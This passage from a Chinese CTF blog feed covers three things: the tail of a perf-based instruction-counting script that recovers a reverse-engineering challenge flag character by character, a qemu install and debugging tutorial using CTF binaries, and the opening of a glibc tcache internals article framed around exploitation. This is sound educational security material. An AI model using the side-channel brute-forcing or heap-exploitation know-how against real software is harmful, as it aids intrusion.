class="mi">0</span> <span class="n">count_chr</span> <span class="o">=</span> <span class="s1">&#39;&#39;</span> <span class="k">for</span> <span class="n">i</span> <span class="ow">in</span> <span class="n">string</span><span class="o">.</span><span class="n">printable</span><span class="p">:</span> <span class="n">write_file</span><span class="p">(</span><span class="n">flag</span> <span class="o">+</span> <span class="n">i</span><span class="p">)</span> <span class="n">target</span> <span class="o">=</span> <span class="n">Popen</span><span class="p">(</span><span class="n">command</span><span class="p">,</span> <span class="n">stdout</span><span class="o">=</span><span class="n">PIPE</span><span class="p">,</span> <span class="n">stdin</span><span class="o">=</span><span class="n">PIPE</span><span class="p">,</span> <span class="n">stderr</span><span class="o">=</span><span class="n">STDOUT</span><span class="p">,</span> <span class="n">shell</span><span class="o">=</span><span class="bp">True</span><span class="p">)</span> <span class="n">target_output</span> <span class="o">=</span> <span class="n">target</span><span class="o">.</span><span class="n">communicate</span><span class="p">()</span> <span class="c1"># import pdb;pdb.set_trace()</span> <span class="c1"># print(target_output)</span> <span class="n">instructions</span> <span class="o">=</span> <span class="nb">int</span><span class="p">(</span><span class="n">target_output</span><span class="p">[</span><span class="mi">0</span><span class="p">]</span><span class="o">.</span><span class="n">split</span><span class="p">(</span><span class="s1">&#39;:&#39;</span><span class="p">)[</span><span class="mi">0</span><span class="p">])</span> <span class="k">if</span> <span class="n">ins_count</span> <span class="o">+</span> <span class="mi">20</span> <span class="o">&gt;</span> <span class="n">instructions</span> <span class="o">&gt;</span> <span class="n">ins_count</span> <span class="o">+</span> <span class="mi">10</span><span class="p">:</span> <span class="n">count_chr</span> <span class="o">=</span> <span class="n">i</span> <span class="n">delta</span> <span class="o">=</span> <span class="n">instructions</span> <span class="o">-</span> <span class="n">ins_count</span> <span class="n">ins_count</span> <span class="o">=</span> <span class="n">instructions</span> <span class="k">break</span> <span class="n">flag</span> <span class="o">+=</span> <span class="n">count_chr</span> <span class="k">print</span><span class="p">(</span><span class="n">delta</span><span class="p">,</span> <span class="n">flag</span><span class="p">)</span> </code></pre></td></tr></table> </div> </div><p>整个过程耗时不到 1 分钟，远远快于使用 pintool 的方法。</p> <blockquote> <p>这里使用了统计用户态总指令数这种相对粗糙的方法，有兴趣的同学还可以试试精确的只统计某种 pt packet（tnt, tip 等）数目来达到更为精准的结果。</p> </blockquote> <h1 id="summary">summary</h1> <blockquote> <p>pin-in-CTF is dead, I prefer perf.</p> </blockquote> <p>使用 perf 来解决这类问题有以下优点：</p> <ul> <li><strong>基于硬件，runtime overhead &lt; 5%</strong></li> <li><strong>可以通过只保留用户态指令或者只保留某种特定的 pt 数据包来达到更精确的效果</strong></li> <li><strong>工具较为成熟，直接使用即可</strong></li> <li><strong>intel pt 本身就是内核模块，可以用于内核态</strong></li> </ul> <p>前文简单的展示了如何使用 perf 这个工具解决一部分 CTF reverse challenge，但也仅仅展现了 perf/intel pt 这个强大工具的冰山一角，更多的高级用法和 trick 还需要大家一起学习和脑洞。</p> <h1 id="reference">reference</h1> <ul> <li><a href="https://perf.wiki.kernel.org/index.php/Main_Page">https://perf.wiki.kernel.org/index.php/Main_Page</a></li> <li><a href="https://en.wikipedia.org/wiki/Perf_(Linux)">https://en.wikipedia.org/wiki/Perf_(Linux)</a></li> </ul> https://bash-c.github.io/post/escaping-the-matrix-1/ Mon, 03 Dec 2018 20:04:42 +0800 https://bash-c.github.io/post/escaping-the-matrix-1/ <h2 id="什么是-qemu">什么是 qemu</h2> <p><a href="https://www.qemu.org/">qemu</a> 是一款由 <a href="https://bellard.org/">Fabrice Bellard</a> 等人编写的可以执行硬件虚拟化的开源托管虚拟机，具有运行速度快（配合 kvm），跨平台等优点。</p> <p>qemu 通过动态的二进制转化模拟 CPU，并且提供一组设备模型，使其能够运行多种未修改的客户机OS。</p> <p>在 ctf 比赛中，qemu 多用于启动异架构(mips, arm 等)的程序、kernel 和 bootloader 等二进制程序，有时也会作为要 pwn 掉的目标。</p> <h3 id="运行模式">运行模式</h3> <p>qemu 有多种运行模式，常用的有 <code>User-mode emulation</code> 和 <code>System emulation</code> 两种。</p> <h4 id="user-mode-emulation">User-mode emulation</h4> <p>用户模式，在这个模式下，qemu 可以运行单个其他指令集的 linux 或者 macOS/darwin 程序，<strong>允许了为一种架构编译的程序在另外一种架构上面运行</strong>。</p> <h4 id="system-emulation">System emulation</h4> <p>系统模式，在这个模式下，qemu 将模拟一个完整的计算机系统，包括外围设备。</p> <blockquote> <p>之后将分别为两种情况举例</p> </blockquote> <h2 id="安装-qemu">安装 qemu</h2> <h3 id="使用包管理">使用包管理</h3> <p>一般情况下，如无特殊需要（如为了运行某个 CTF 比赛中的异架构程序或者 kernel）直接使用对应的包管理直接安装即可</p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre class="chroma"><code><span class="lnt"> 1 </span><span class="lnt"> 2 </span><span class="lnt"> 3 </span><span class="lnt"> 4 </span><span class="lnt"> 5 </span><span class="lnt"> 6 </span><span class="lnt"> 7 </span><span class="lnt"> 8 </span><span class="lnt"> 9 </span><span class="lnt">10 </span><span class="lnt">11 </span></code></pre></td> <td class="lntd"> <pre class="chroma"><code class="language-bash" data-lang="bash"> Arch: pacman -S qemu Debian/Ubuntu: apt-get install qemu Fedora: dnf install @virtualization Gentoo: emerge --ask app-emulation/qemu RHEL/CentOS: yum install qemu-kvm SUSE: zypper install qemu </code></pre></td></tr></table> </div> </div><blockquote> <p>这里只说明在 linux 下的安装过程，其他系统的安装过程请参考 <a href="https://www.qemu.org/download/">官方网站</a></p> </blockquote> <h3 id="从源码编译">从源码编译</h3> <p>通过包管理安装的 qemu 版本一般较老，如果需要新版的 qemu，可以从源码编译，这里以编译 <code>3.1.0-rc3</code> 的 qemu 为例。</p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre class="chroma"><code><span class="lnt">1 </span><span class="lnt">2 </span><span class="lnt">3 </span></code></pre></td> <td class="lntd"> <pre class="chroma"><code class="language-bash" data-lang="bash">wget https://download.qemu.org/qemu-3.1.0-rc3.tar.xz tar xvJf qemu-3.1.0-rc3.tar.xz <span class="nb">cd</span> qemu-3.1.0-rc3 </code></pre></td></tr></table> </div> </div><p>通过 <code>./configure --help</code> 的查看编译时的选项， <code>--target-list</code> 选项为可选的模拟器，默认全选</p> <blockquote> <p><code>--target-list</code> 中的 <code>xxx-soft</code> 和 <code>xxx-linux-user</code> 分别指系统模拟器和应用程序模拟器, 生成的二进制文件名字为 <code>qemu-system-xxx</code> 和 <code>qemu-xxx</code></p> </blockquote> <p>安装必要依赖</p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre class="chroma"><code><span class="lnt">1 </span></code></pre></td> <td class="lntd"> <pre class="chroma"><code class="language-bash" data-lang="bash">sudo apt-get install git libglib2.0-dev libfdt-dev libpixman-1-dev zlib1g-dev libsdl-dev </code></pre></td></tr></table> </div> </div><p>选择安装 <a href="https://wiki.qemu.org/Hosts/Linux">可选依赖</a></p> <p>这里直接使用默认选项进行编译</p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre class="chroma"><code><span class="lnt">1 </span><span class="lnt">2 </span></code></pre></td> <td class="lntd"> <pre class="chroma"><code class="language-fallback" data-lang="fallback">./configure make -j8 </code></pre></td></tr></table> </div> </div><p>继续安装</p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre class="chroma"><code><span class="lnt">1 </span></code></pre></td> <td class="lntd"> <pre class="chroma"><code class="language-bash" data-lang="bash">sudo make install </code></pre></td></tr></table> </div> </div><p>成功安装</p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre class="chroma"><code><span class="lnt">1 </span><span class="lnt">2 </span><span class="lnt">3 </span></code></pre></td> <td class="lntd"> <pre class="chroma"><code class="language-bash" data-lang="bash">~ qemu-arm --version qemu-arm version 3.0.93 Copyright <span class="o">(</span>c<span class="o">)</span> 2003-2018 Fabrice Bellard and the QEMU Project developers </code></pre></td></tr></table> </div> </div><h2 id="使用-qemu">使用 qemu</h2> <p>以 CISCN 2017 的 <a href="https://github.com/ctf-wiki/ctf-challenges/tree/master/pwn/kernel/CISCN2017-babydriver">babydriver</a> 举例，查看启动脚本</p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre class="chroma"><code><span class="lnt">1 </span><span class="lnt">2 </span><span class="lnt">3 </span><span class="lnt">4 </span><span class="lnt">5 </span><span class="lnt">6 </span><span class="lnt">7 </span><span class="lnt">8 </span></code></pre></td> <td class="lntd"> <pre class="chroma"><code class="language-bash" data-lang="bash">CISCN2017_babydriver <span class="o">[</span>master●<span class="o">]</span> bat boot.sh ───────┬──────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────── │ File: boot.sh ───────┼──────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────── <span class="m">1</span> │ <span class="c1">#!/bin/bash</span> <span class="m">2</span> │ <span class="m">3</span> │ qemu-system-x86_64 -initrd rootfs.cpio -kernel bzImage -append <span class="s1">&#39;console=ttyS0 root=/dev/ram oops=panic panic=1&#39;</span> -enable-kvm -monitor /dev/null -m 64M - │ -nographic -smp <span class="nv">cores</span><span class="o">=</span>1,threads<span class="o">=</span><span class="m">1</span> -cpu kvm64,+smep </code></pre></td></tr></table> </div> </div><p>可以看出这道题目是用 <code>qemu-system-x86_64</code> 启动了以 <code>rootfs.cpio</code> 为文件系统的 kernel <code>bzImage</code>，启动时的参数为 <code>console=ttyS0 ... panic=1</code>，为这个进程分配 64M 内存。</p> <blockquote> <p>更多参数的含义请通过 <code>-h</code> 或者 <a href="https://qemu.weilnetz.de/doc/qemu-doc.html">qemu-doc</a> 查看。</p> </blockquote> <blockquote> <p>如果使用包管理安装 qemu，直接安装 <code>qemu-system-x86_64</code> 即可</p> </blockquote> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre class="chroma"><code><span class="lnt">1 </span></code></pre></td> <td class="lntd"> <pre class="chroma"><code class="language-bash" data-lang="bash">sudo apt install qemu-system_x86-64 </code></pre></td></tr></table> </div> </div><p>因为使用了 kvm，所以启动时要用 root 权限启动</p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre class="chroma"><code><span class="lnt">1 </span><span class="lnt">2 </span><span class="lnt">3 </span><span class="lnt">4 </span><span class="lnt">5 </span><span class="lnt">6 </span><span class="lnt">7 </span><span class="lnt">8 </span></code></pre></td> <td class="lntd"> <pre class="chroma"><code class="language-bash" data-lang="bash">CISCN2017_babydriver <span class="o">[</span>master●<span class="o">]</span> sudo ./boot.sh ...... ...... / $ id <span class="nv">uid</span><span class="o">=</span>1000<span class="o">(</span>ctf<span class="o">)</span> <span class="nv">gid</span><span class="o">=</span>1000<span class="o">(</span>ctf<span class="o">)</span> <span class="nv">groups</span><span class="o">=</span>1000<span class="o">(</span>ctf<span class="o">)</span> / $ ls bin etc init linuxrc root sys usr dev home lib proc sbin tmp </code></pre></td></tr></table> </div> </div><blockquote> <p>这道题目的更多分析可以看 <a href="http://m4x.fun/post/linux-kernel-pwn-abc-1/#kernel-uaf-ciscn2017-babydriver">link</a></p> </blockquote> <p>同样，再看下 Codegate 2018 的<a href="https://github.com/bash-c/ctf-challenges/tree/master/pwn/arm/Codegate2018_Melong">Melong</a></p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre class="chroma"><code><span class="lnt"> 1 </span><span class="lnt"> 2 </span><span class="lnt"> 3 </span><span class="lnt"> 4 </span><span class="lnt"> 5 </span><span class="lnt"> 6 </span><span class="lnt"> 7 </span><span class="lnt"> 8 </span><span class="lnt"> 9 </span><span class="lnt">10 </span></code></pre></td> <td class="lntd"> <pre class="chroma"><code class="language-bash" data-lang="bash">Codegate2018_Melong <span class="o">[</span>master<span class="o">]</span> check melong + file melong melong: ELF 32-bit LSB executable, ARM, EABI5 version <span class="m">1</span> <span class="o">(</span>SYSV<span class="o">)</span>, dynamically linked, interpreter /lib/ld-linux.so.3, <span class="k">for</span> GNU/Linux 3.2.0, BuildID<span class="o">[</span>sha1<span class="o">]=</span>2c55e75a072020303e7c802d32a5b82432f329e9, not stripped + checksec melong <span class="o">[</span>*<span class="o">]</span> <span class="s1">&#39;/home/m4x/Projects/pwn_repo/Codegate2018_Melong/melong&#39;</span> Arch: arm-32-little RELRO: Partial RELRO Stack: No canary found NX: NX enabled PIE: No PIE <span class="o">(</span>0x10000<span class="o">)</span> </code></pre></td></tr></table> </div> </div><p>可以看出是 32 位 的 arm 程序，需要安装 <code>qemu-arm</code></p> <blockquote> <p>如果使用包管理安装，则</p> </blockquote> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre class="chroma"><code><span class="lnt">1 </span><span class="lnt">2 </span></code></pre></td> <td class="lntd"> <pre class="chroma"><code class="language-bash" data-lang="bash">$ sudo apt-get install qemu-user $ sudo apt-get install qemu-use-binfmt qemu-user-binfmt:i386 </code></pre></td></tr></table> </div> </div><p>这样就安装了 <code>qemu-arm</code></p> <p>但同时因为程序是动态链接的，还需要同时安装对应的 libc，可以使用 <code>apt search &quot;libc6-&quot; | grep &quot;ARCH&quot;</code> 搜索，如</p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre class="chroma"><code><span class="lnt"> 1 </span><span class="lnt"> 2 </span><span class="lnt"> 3 </span><span class="lnt"> 4 </span><span class="lnt"> 5 </span><span class="lnt"> 6 </span><span class="lnt"> 7 </span><span class="lnt"> 8 </span><span class="lnt"> 9 </span><span class="lnt">10 </span><span class="lnt">11 </span><span class="lnt">12 </span><span class="lnt">13 </span><span class="lnt">14 </span><span class="lnt">15 </span><span class="lnt">16 </span><span class="lnt">17 </span><span class="lnt">18 </span><span class="lnt">19 </span><span class="lnt">20 </span><span class="lnt">21 </span><span class="lnt">22 </span><span class="lnt">23 </span><span class="lnt">24 </span><span class="lnt">25 </span><span class="lnt">26 </span><span class="lnt">27 </span><span class="lnt">28 </span><span class="lnt">29 </span><span class="lnt">30 </span></code></pre></td> <td class="lntd"> <pre class="chroma"><code class="language-bash" data-lang="bash">Codegate2018_Melong <span class="o">[</span>master<span class="o">]</span> apt search <span class="s2">&#34;libc6-&#34;</span><span class="p">|</span> grep arm p libc6-arm64-cross - GNU C Library: Shared libraries <span class="o">(</span><span class="k">for</span> cross-compiling<span class="o">)</span> v libc6-arm64-dcv1 - v libc6-armel-armel-cross - p libc6-armel-armhf-cross - Dummy package to get libc6:armel installed p libc6-armel-cross - GNU C Library: Shared libraries <span class="o">(</span><span class="k">for</span> cross-compiling<span class="o">)</span> v libc6-armel-dcv1 - p libc6-armhf-armel-cross - Dummy package to get libc6:armhf installed v libc6-armhf-armhf-cross - p libc6-armhf-cross - GNU C Library: Shared libraries <span class="o">(</span><span class="k">for</span> cross-compiling<span class="o">)</span> v libc6-armhf-dcv1 - p libc6-dbg-arm64-cross - GNU C Library: detached debugging symbols <span class="o">(</span><span class="k">for</span> cross-compiling<span class="o">)</span> v libc6-dbg-arm64-dcv1 - p libc6-dbg-armel-cross - GNU C Library: detached debugging symbols <span class="o">(</span><span class="k">for</span> cross-compiling<span class="o">)</span> v libc6-dbg-armel-dcv1 - p libc6-dbg-armhf-cross - GNU C Library: detached debugging symbols <span class="o">(</span><span class="k">for</span> cross-compiling<span class="o">)</span> v libc6-dbg-armhf-dcv1 - p libc6-dev-arm64-cross - GNU C Library: Development Libraries and Header Files <span class="o">(</span><span class="k">for</span> cross-compiling<span class="o">)</span> v libc6-dev-arm64-cross:i386 - v libc6-dev-arm64-dcv1 - v libc6-dev-armel-armel-cross - p libc6-dev-armel-armhf-cross - Dummy package to get libc6-dev:armel installed p libc6-dev-armel-cross - GNU C Library: Development Libraries and Header Files <span class="o">(</span><span class="k">for</span> cross-compiling<span class="o">)</span> v libc6-dev-armel-cross:i386 - v libc6-dev-armel-dcv1 - p libc6-dev-armhf-armel-cross - Dummy package to get libc6-dev:armhf installed v libc6-dev-armhf-armhf-cross - p libc6-dev-armhf-cross - GNU C Library: Development Libraries and Header Files <span class="o">(</span><span class="k">for</span> cross-compiling<span class="o">)</span> v libc6-dev-armhf-cross:i386 - v libc6-dev-armhf-dcv1 - </code></pre></td></tr></table> </div> </div><p>只需要安装 <code>libc6-ARCH-cross</code> 的包即可。</p> <p>装好后使用 <code>-L</code> 指定共享库路径即可运行文件。</p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre class="chroma"><code><span class="lnt">1 </span></code></pre></td> <td class="lntd"> <pre class="chroma"><code class="language-bash" data-lang="bash">$ qemu-arm -L /usr/arm-linux-gnueabi ./melong </code></pre></td></tr></table> </div> </div><blockquote> <p>这道题目的更多分析可以看 <a href="http://m4x.fun/post/how-2-pwn-an-arm-binary/#codegate2018-melong">link</a></p> </blockquote> <p>如果是静态的程序，不需要 libc，则可以不用 <code>-L</code> 选项，如 Jarvis-OJ 的 <a href="https://github.com/ctf-wiki/ctf-challenges/tree/master/pwn/arm/jarvisOJ_typo">typo</a></p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre class="chroma"><code><span class="lnt"> 1 </span><span class="lnt"> 2 </span><span class="lnt"> 3 </span><span class="lnt"> 4 </span><span class="lnt"> 5 </span><span class="lnt"> 6 </span><span class="lnt"> 7 </span><span class="lnt"> 8 </span><span class="lnt"> 9 </span><span class="lnt">10 </span><span class="lnt">11 </span><span class="lnt">12 </span><span class="lnt">13 </span><span class="lnt">14 </span><span class="lnt">15 </span></code></pre></td> <td class="lntd"> <pre class="chroma"><code class="language-bash" data-lang="bash">jarvisOJ_typo <span class="o">[</span>master<span class="o">]</span> check ./typo + file ./typo ./typo: ELF 32-bit LSB executable, ARM, EABI5 version <span class="m">1</span> <span class="o">(</span>SYSV<span class="o">)</span>, statically linked, <span class="k">for</span> GNU/Linux 2.6.32, BuildID<span class="o">[</span>sha1<span class="o">]=</span>211877f58b5a0e8774b8a3a72c83890f8cd38e63, stripped + checksec ./typo <span class="o">[</span>*<span class="o">]</span> <span class="s1">&#39;/home/m4x/Projects/pwn_repo/jarvisOJ_typo/typo&#39;</span> Arch: arm-32-little RELRO: Partial RELRO Stack: No canary found NX: NX enabled PIE: No PIE <span class="o">(</span>0x8000<span class="o">)</span> jarvisOJ_typo <span class="o">[</span>master<span class="o">]</span> qemu-arm ./typo Let<span class="err">&#39;</span>s Do Some Typing Exercise~ Press Enter to get start<span class="p">;</span> Input ~ <span class="k">if</span> you want to quit ^C </code></pre></td></tr></table> </div> </div><h2 id="如何-debug">如何 debug</h2> <p>分两种情况</p> <ol> <li>调试 qemu 这个进程</li> <li>调试 qemu 内运行的程序</li> </ol> <h3 id="调试-qemu">调试 qemu</h3> <p>对于第一种情况，直接使用 gdb attach 到 qemu 的进程号即可，为了调试时方便可以在编译时加上 <code>--enable-debug</code> 选项以保留符号等信息。</p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre class="chroma"><code><span class="lnt">1 </span></code></pre></td> <td class="lntd"> <pre class="chroma"><code class="language-fallback" data-lang="fallback"> --enable-debug enable common debug build options </code></pre></td></tr></table> </div> </div><p>在之后的 qemu 逃逸中会着重介绍这个过程。</p> <h3 id="调试-qemu-中的进程">调试 qemu 中的进程</h3> <p>qemu 提供了 gdb 的接口，通过 <code>-g</code> 指定端口来调用</p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre class="chroma"><code><span class="lnt">1 </span></code></pre></td> <td class="lntd"> <pre class="chroma"><code class="language-fallback" data-lang="fallback">-g port QEMU_GDB wait gdb connection to &#39;port&#39; </code></pre></td></tr></table> </div> </div><p>同时为了调试异架构的程序，需要安装 <code>gdb-multiarch</code></p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre class="chroma"><code><span class="lnt">1 </span></code></pre></td> <td class="lntd"> <pre class="chroma"><code class="language-bash" data-lang="bash">sudo apt install gdb-multiarch </code></pre></td></tr></table> </div> </div><p>例如 Melong 中，使用</p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre class="chroma"><code><span class="lnt">1 </span></code></pre></td> <td class="lntd"> <pre class="chroma"><code class="language-bash" data-lang="bash">$ qemu-arm -g <span class="m">1234</span> -L /usr/arm-linux-gnueabi ./melong </code></pre></td></tr></table> </div> </div><p>启动程序，在另一个 shell 中使用 <code>gdb-multiarch</code> 启动程序并连接到指定的端口即可调试</p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre class="chroma"><code><span class="lnt">1 </span><span class="lnt">2 </span><span class="lnt">3 </span><span class="lnt">4 </span><span class="lnt">5 </span></code></pre></td> <td class="lntd"> <pre class="chroma"><code class="language-bash" data-lang="bash">Codegate2018_Melong <span class="o">[</span>master<span class="o">]</span> gdb-multiarch ./melong -q pwndbg: loaded <span class="m">175</span> commands. Type pwndbg <span class="o">[</span>filter<span class="o">]</span> <span class="k">for</span> a list. pwndbg: created <span class="nv">$rebase</span>, <span class="nv">$ida</span> gdb functions <span class="o">(</span>can be used with print/break<span class="o">)</span> Reading symbols from ./melong...<span class="o">(</span>no debugging symbols found<span class="o">)</span>...done. pwndbg&gt; target remote localhost:1234 </code></pre></td></tr></table> </div> </div><blockquote> <p>使用 gdb-multriarch 可以调试大多数的程序。</p> <p>但也有部分程序不能使用 gdb-multiarch，这时可以编译对应架构的 Toolchain，如 <code>arm-none-eabi-gdb</code></p> <p>或者使用系统模式的 qemu 创建一个对应架构的虚拟机，文末放了一片链接，以后也会介绍这种方法。</p> </blockquote> <p>特别的是系统模式的 qemu 还提供了另外几个参数</p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre class="chroma"><code><span class="lnt">1 </span><span class="lnt">2 </span><span class="lnt">3 </span></code></pre></td> <td class="lntd"> <pre class="chroma"><code class="language-fallback" data-lang="fallback">-gdb dev wait for gdb connection on &#39;dev&#39; -s shorthand for -gdb tcp::1234 -S freeze CPU at startup (use &#39;c&#39; to start execution) </code></pre></td></tr></table> </div> </div><p><code>-gdb</code> 作用类似 <code>-g</code>，使用 <code>-gdb tcp::1234</code> 即可在 gdb 中通过 1234 端口调试。</p> <p><code>-s</code> 是 <code>-gdb tcp::1234</code> 的缩写</p> <p><code>-S</code> 让虚拟机停在启动的地方方便调试，类似于 pwntools 的 <a href="http://docs.pwntools.com/en/stable/gdb.html?highlight=gdb.debug#pwnlib.gdb.debug">gdb.debug()</a></p> <h2 id="reference">Reference</h2> <p><a href="https://wiki.qemu.org/Main_Page">https://wiki.qemu.org/Main_Page</a></p> <p><a href="https://qemu.weilnetz.de/doc/qemu-doc.html">https://qemu.weilnetz.de/doc/qemu-doc.html</a></p> <p><a href="https://wiki.qemu.org/Documentation">https://wiki.qemu.org/Documentation</a></p> <p><a href="https://en.wikipedia.org/wiki/QEMU">https://en.wikipedia.org/wiki/QEMU</a></p> <p><a href="https://www.ringzerolabs.com/2018/03/the-wonderful-world-of-mips.html">https://www.ringzerolabs.com/2018/03/the-wonderful-world-of-mips.html</a></p> <p><a href="https://wiki.qemu.org/Hosts/Linux">https://wiki.qemu.org/Hosts/Linux</a></p> https://bash-c.github.io/post/dive-into-tcache/ Sun, 14 Oct 2018 20:22:25 +0800 https://bash-c.github.io/post/dive-into-tcache/ <p>tcache 是 glibc 2.26(ubuntu 17.10) 之后引入的一种技术（see <a href="https://sourceware.org/git/?p=glibc.git;a=commitdiff;h=d5c3fafc4307c9b7a4c7d5cb381fcdbfad340bcc">commit</a>），目的是提升堆管理的性能。但提升性能的同时舍弃了很多安全检查，也因此有了很多新的利用方式。</p> <blockquote> <p>主要参考了 glibc 源码，angelboy 的 slide 以及 tukan.farm，链接都放在最后了。</p> </blockquote> <h2 id="new-structure">New Structure</h2> <p>tcache 引入了两个新的结构体，<code>tcache_entry</code> 和 <code>tcache_perthread_struct</code>。</p> <p><strong>tcache_entry</strong></p> <p><a href="https://code.woboq.org/userspace/glibc/malloc/malloc.c.html#tcache_entry">source code</a></p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre class="chroma"><code><span class="lnt">1 </span><span class="lnt">2 </span><span class="lnt">3 </span><span class="lnt">4 </span><span class="lnt">5 </span><span class="lnt">6 </span></code></pre></td> <td class="lntd"> <pre class="chroma"><code class="language-C" data-lang="C"><span class="cm">/* We overlay this structure on the user-data portion of a chunk when </span><span class="cm"> the chunk is stored in the per-thread cache. */</span> <span class="k">typedef</span> <span class="k">struct</span> <span class="n">tcache_entry</span> <span class="p">{</span> <span class="k">struct</span> <span class="n">tcache_entry</span> <span class="o">*</span><span class="n">next</span><span class="p">;</span> <span class="p">}</span> <span class="n">tcache_entry</span><span class="p">;</span> </code></pre></td></tr></table> </div> </div><p><strong>tcache_perthread_struct</strong></p> <p><a href="https://code.woboq.org/userspace/glibc/malloc/malloc.c.html#tcache_perthread_struct">source code</a></p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre class="chroma"><code><span class="lnt"> 1 </span><span class="lnt"> 2 </span><span class="lnt"> 3 </span><span class="lnt"> 4 </span><span class="lnt"> 5 </span><span class="lnt"> 6 </span><span class="lnt"> 7 </span><span class="lnt"> 8 </span><span class="lnt"> 9 </span><span class="lnt">10 </span><span class="lnt">11 </span><span class="lnt">12 </span><span class="lnt">13 </span><span class="lnt">14 </span></code></pre></td> <td class="lntd"> <pre class="chroma"><code class="language-C" data-lang="C"><span class="cm">/* There is one of these for each thread, which contains the </span><span class="cm"> per-thread cache (hence &#34;tcache_perthread_struct&#34;). Keeping </span><span class="cm"> overall size low is mildly important. Note that COUNTS and ENTRIES </span><span class="cm"> are redundant (we could have just counted the linked list each </span><span class="cm"> time), this is for performance reasons. */</span> <span class="k">typedef</span> <span class="k">struct</span> <span class="n">tcache_perthread_struct</span> <span class="p">{</span> <span class="kt">char</span> <span class="n">counts</span><span class="p">[</span><span class="n">TCACHE_MAX_BINS</span><span class="p">];</span> <span class="n">tcache_entry</span> <span class="o">*</span><span class="n">entries</span><span class="p">[</span><span class="n">TCACHE_MAX_BINS</span><span class="p">];</span> <span class="p">}</span> <span class="n">tcache_perthread_struct</span><span class="p">;</span> <span class="cp"># define TCACHE_MAX_BINS 64 </span><span class="cp"></span> <span class="k">static</span> <span class="n">__thread</span> <span class="n">tcache_perthread_struct</span> <span class="o">*</span><span class="n">tcache</span> <span class="o">=</span> <span class="nb">NULL</span><span class="p">;</span> </code></pre></td></tr></table> </div> </div><hr> <p>先给一个宏观印象：</p> <ul> <li><code>tcache_prethread_struct</code> 是整个 tcache 的管理结构，其中有 64 项 entries。每个 entries 管理了若干个大小相同的 chunk，用单向链表 (<code>tcache_entry</code>) 的方式连接释放的 chunk，这一点上和 fastbin 很像</li> <li>每个 thread 都会维护一个 <code>tcache_prethread_struct</code></li> <li><code>tcache_prethread_struct</code> 中的 <code>counts</code> 记录 <code>entries</code> 中每一条链上 chunk 的数目，每条链上最多可以有 7 个 chunk</li> <li><code>tcache_entry</code> 用于链接 chunk 结构体，其中的 <code>next</code> 指针指向下一个大小相同的 chunk <ul> <li>这里与 fastbin 不同的是 fastbin 的 fd 指向 chunk 开头的地址，而 tcache 的 next 指向 user data 的地方，即 chunk header 之后</li> </ul> </li> </ul> <p>用图表示大概是：</p> <p><img src="http://ww1.sinaimg.cn/large/006AWYXBly1fw87zlnrhtj30nh0ciglz.jpg" alt=""></p> <h2 id="相关函数">相关函数</h2> <p>同样先给一个宏观的印象：</p> <ul> <li>第一次 malloc 时，会先 malloc 一块内存用来存放 <code>tcache_prethread_struct</code></li> <li>free 内存，且 size 小于 small bin size 时 <ul> <li>tcache 之前会放到 fastbin 或者 unsorted bin 中</li> <li>tcache 后： <ul> <li>先放到对应的 tcache 中，直到 tcache 被填满（默认是 7 个）</li> <li>tcache 被填满之后，再次 free 的内存和之前一样被放到 fastbin 或者 unsorted bin 中</li> <li>tcache 中的 chunk 不会合并（不取消 inuse bit）</li> </ul> </li> </ul> </li> <li>malloc 内存，且 size 在 tcache 范围内 <ul> <li>先从 tcache 取 chunk，直到 tcache 为空</li> <li>tcache 为空后，从 bin 中找</li> <li>tcache 为空时，如果 <code>fastbin/smallbin/unsorted bin</code> 中有 size 符合的 chunk，会先把 <code>fastbin/smallbin/unsorted bin</code> 中的 chunk 放到 tcache 中，直到填满。之后再从 tcache 中取；因此 chunk 在 bin 中和 tcache 中的顺序会反过来</li> </ul> </li> </ul> <h3 id="source-code">source code</h3> <p>接下来从源码的角度分析一下 tcache。</p> <h4 id="__libc_malloc">__libc_malloc</h4> <p>第一次 malloc 时，会进入到 <code>MAYBE_INIT_TCACHE ()</code></p> <p><a href="https://code.woboq.org/userspace/glibc/malloc/malloc.c.html#3010">source code</a></p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre class="chroma"><code><span class="lnt"> 1 </span><span class="lnt"> 2 </span><span class="lnt"> 3 </span><span class="lnt"> 4 </span><span class="lnt"> 5 </span><span class="lnt"> 6 </span><span class="lnt"> 7 </span><span class="lnt"> 8 </span><span class="lnt"> 9 </span><span class="lnt">10 </span><span class="lnt">11 </span><span class="lnt">12 </span><span class="lnt">13 </span><span class="lnt">14 </span><span class="lnt">15 </span><span class="lnt">16 </span><span class="lnt">17 </span><span class="lnt">18 </span><span class="lnt">19 </span><span class="lnt">20 </span><span class="lnt">21 </span><span class="lnt">22 </span><span class="lnt">23 </span><span class="lnt">24 </span><span class="lnt">25 </span><span class="lnt">26 </span><span class="lnt">27 </span></code></pre></td> <td class="lntd"> <pre class="chroma"><code 